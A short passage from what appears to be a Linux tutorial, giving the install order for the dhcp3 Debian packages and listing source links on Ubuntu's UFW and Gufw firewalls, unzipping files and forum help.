    dhcp3-server_3.1.3-2ubuntu3_i386.deb

    and install the .deb files (or with synaptic) in this order:

    dhcp3-common
    dhcp3-server
    dhcp3-client

    Sources:
    http://www.proprofs.com/webschool/search.php?tag=true&search=backtrack,+hackers,+hacking,+linux,+nmap,+snort,+power
    http://www.wikihow.com/Unzip-Files-in-Linux
    https://help.ubuntu.com/community/UFW
    www.youtube.com/watch?v=cscIe9fYKMU
    http://www.ubuntugeek.com/ufw-uncomplicated-firewall-for-ubuntu-hardy.html
    https://help.ubuntu.com/community/Gufw
    http://ubuntuforums.org/showthread.php?t=823741

    Appendix Two:
